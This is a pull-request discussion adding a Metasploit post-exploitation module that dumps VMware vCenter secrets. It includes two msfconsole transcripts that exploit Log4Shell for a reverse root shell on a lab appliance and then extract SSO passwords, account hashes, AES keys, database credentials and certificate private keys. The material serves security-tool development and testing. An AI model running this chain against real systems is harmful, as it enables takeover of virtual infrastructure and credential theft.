Add vcenter_secrets_dump post module

[h00die]

This is a rework of #16465 and expands on the work of @npm-cesium137-io but unfortunately they seem to gone missing (mainly due to my rework taking a long time). It moves many of the functions to a library and includes a spec so we can track changes and ensure the code is working.

This PR is part of a series of PRs. After this lands, I'll add in @ErikWynter 's two modules, but want to get this pushed to master before we start expanding so we have a good base of work to go off of.

This module adds a new post module for vcenter . to test it, you'll want to root a vcenter (i've been using my log4j box for this purpose).

Verification

• Start msfconsole
• use an exploit to get root on a box, such as exploit/multi/http/vmware_vcenter_log4shell
• use vcenter_secrets_dump
• set session 1
• run
• Verify no errors are encountered
• Documentation looks good

[h00die]

@ErikWynter @npm-cesium137-io can you all test this module? I suspect there are still some bugs (hence why its draft) since my vcenter doesn't have any ESXs connected to control, and there are many ways to configure vcenter other than what I have.

please post (sanitized) output here, I left the docs in their old state until I can finalize everything a bit more

[jmartin-tech]

@msjenkins-r7 test this please.

[dwelch-r7]

Nice work, love the comments :D

There seems to be some overlap in the functionality you have here with other libs, might be a good idea to have a discussion on how we want to consolidate them? things like vm_dir for example

[h00die]

I'm going to go ahead and open this up. While it isn't 100% finished, I don't have SSO setup and am hoping someone will who can test that portion, its the last part and I just need to know what the output is from the cmd_exec command to lib it all up. Other than that move, i think the rest is ready to test.

[smcintyre-r7]

I don't have SSO setup and am hoping someone will who can test that portion, its the last part and I just need to know what the output is from the cmd_exec command to lib it all up.

Are we blocked on this? I can't guarantee we'll have an SSO setup for testing, so if we're blocked on that, would it make sense to just omit it for now?

[h00die]

Module will work w/o it, so shouldn't be a blocker.

[h00die]

Updated to address comments.
It's been so long I'm not sure if I was getting this error before, will trace it down this week to see if its in my code or a payload issue

[*] Dumping vmdir schema to LDIF and storing to loot...
[-] Failed to open file: /tmp/.vsphere.local_20220918213126.tmp: core_channel_open: Operation failed: 1
[!] Unable to retrieve ldif contents
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/h00die/.msf4/loot/20220918213127_default_192.168.2.203_vmca_090364.key
[+] VMCA_ROOT cert: /home/h00die/.msf4/loot/20220918213128_default_192.168.2.203_vmca_058942.pem
[!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files...
[-] Error processing IdP trusted certificate private key

[h00die]

Updated to address comments. It's been so long I'm not sure if I was getting this error before, will trace it down this week to see if its in my code or a payload issue

[*] Dumping vmdir schema to LDIF and storing to loot...
[-] Failed to open file: /tmp/.vsphere.local_20220918213126.tmp: core_channel_open: Operation failed: 1
[!] Unable to retrieve ldif contents
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/h00die/.msf4/loot/20220918213127_default_192.168.2.203_vmca_090364.key
[+] VMCA_ROOT cert: /home/h00die/.msf4/loot/20220918213128_default_192.168.2.203_vmca_058942.pem
[!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files...
[-] Error processing IdP trusted certificate private key

looks like this was in the previous commit, looking into it still

[ErikWynter]

@h00die thanks for continuing to work on this! Unfortunately I haven't come across a vulnerable instance in quite a while, but next time I do, I'll try to run this one

[h00die]

problem solved, believe ready for review again

[h00die]

just checking in on this, before it falls off the to do list

[bwatters-r7]

msf6 exploit(multi/http/vmware_vcenter_log4shell) > run

[*] Started reverse TCP handler on 10.5.135.109:4568 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443      - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.109:4568 -> 10.5.132.114:54020) at 2022-10-24 12:11:36 -0500
[*] Server stopped.


id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump 
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > show options

Module options (post/linux/gather/vcenter_secrets_dump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on


Post action:

   Name  Description
   ----  -----------
   Dump  Dump vCenter Secrets


msf6 post(linux/gather/vcenter_secrets_dump) > run

[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] 	ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] 	KEY: ,47SU\=+fh<9C?m
[+] 	HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] 	HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] 	VCDB Name: VCDB
[+] 	VCDB User: vc
[+] 	VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221024122441_default_10.5.132.114_vmdir_498874.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] 	  SSOUSER: photon-machine.moose@vsphere.local
[+] 	  SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] 	SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221024122442_default_10.5.132.114_vmca_742773.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221024122442_default_10.5.132.114_vmca_566968.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114_idp_092125.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114_idp_845777.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114___MACHINE_CERT_346174.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114___MACHINE_CERT_187599.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_machine_089886.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_machine_123421.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vspherewebclien_672781.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vspherewebclien_063188.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vpxd_910040.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vpxd_061784.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_vpxdextension_701482.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_vpxdextension_317366.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_dataenciphermen_955390.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_dataenciphermen_886266.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221024122446_default_10.5.132.114_sms_self_signed_127498.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221024122446_default_10.5.132.114_sms_self_signed_611042.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed

[bwatters-r7]

just checking in on this, before it falls off the to do list

#16871 (comment) looks still unresponded/unresolved.

[h00die]

good catch, the gui was hiding that from me. merged, tested, uploaded.

[bwatters-r7]

msf6 exploit(multi/http/vmware_vcenter_log4shell) > run

[*] Started reverse TCP handler on 10.5.135.109:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443      - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.109:4444 -> 10.5.132.114:57164) at 2022-10-27 10:53:23 -0500
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N]  y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump 
msf6 post(linux/gather/vcenter_secrets_dump) > show options

Module options (post/linux/gather/vcenter_secrets_dump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Post action:

   Name  Description
   ----  -----------
   Dump  Dump vCenter Secrets


msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > run

[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] 	ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] 	KEY: ,47SU\=+fh<9C?m
[+] 	HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] 	HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] 	VCDB Name: VCDB
[+] 	VCDB User: vc
[+] 	VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221027110049_default_10.5.132.114_vmdir_949273.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/photon-machine.moose@VSPHERE.LOCAL,cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] 	  SSOUSER: photon-machine.moose@vsphere.local
[+] 	  SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] 	SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_vmca_128689.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_vmca_979914.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_idp_766703.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_idp_956011.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221027110051_default_10.5.132.114___MACHINE_CERT_931284.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221027110051_default_10.5.132.114___MACHINE_CERT_492725.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_machine_948197.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_machine_946055.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vspherewebclien_601663.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vspherewebclien_043993.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxd_210288.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxd_029440.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxdextension_414011.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxdextension_483742.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_dataenciphermen_605774.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_dataenciphermen_742464.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_sms_self_signed_644974.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_sms_self_signed_021024.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed

[bwatters-r7]

Release Notes

Add post/linux/gather module to dump vCenter vmdir dcAccountPassword and platform certificates.

[h00die]

@npm-cesium137-io just wanted to make sure you saw this landed to framework. Sorry it took so long!
@ErikWynter I'll start working on the database portion soon!

[ErikWynter]

@h00die congrats! feel free to ping me if you have any questions about the db stuff or run into anything weird

[HynekPetrak]

@h00die @npm-cesium137-io I came across a Vcenter today, where the password contains a single \, however the module printed \\. I'll debug tomorrow at which stage we shall de-escape.

[HynekPetrak]

@h00die: Correction. The password I got wrongly on screen is not the above but this one: print_good("vSphere SSO DC PW: #{bind_pw}") coming from get_domain_dc_password of lib/msf/core/post/vcenter/vcenter.rb.
The string grepped from registry is already backslash escaped, Which works well for self.shell_bind_pw (and later use in shell comand), but for the screen and for store_valid_credential we shall de-escape it.
Example:

• on screen and stored as credential: vSphere SSO DC PW: Password\\123
• the actual password is: Password\123
  Other special characters might be in theory escaped too though.

[HynekPetrak]

funny update. My bind password has a backtick too, which is for bash a special character, so apart of escaping " via self.bind_pw = bind_pw.gsub('"') { '\\"' } we shall escape the backtick too for the shell_bind_pw variable.
Besides I believe escaping " and backtick shall be made for shell_bind_pw only and not for bind_pw which is printed and stored as credential.

[HynekPetrak]

@h00die : it may have also form of jdbc:postgresql://localhost:5432/VCDB?sslmode=disable
in that case additional - sort of - split('?")[0] required.

[h00die]

@HynekPetrak these are really good issues/things to bring up. Can you start an issue and tag me on it so they don't get lost on this already merged module? I'll either add the updates to #17214 or PR them up if that one lands before i can get to these.

[npm-cesium137-io]

@npm-cesium137-io just wanted to make sure you saw this landed to framework. Sorry it took so long! @ErikWynter I'll start working on the database portion soon!

Hi, I'm amazed that you were able to whip that, uhm, comprehensive pile of code I plopped here into something workable, can't wait to try it out! P.S. trying to deal with all the shell escaping for bind / DB passwords shaved years off my life, too, IKTF.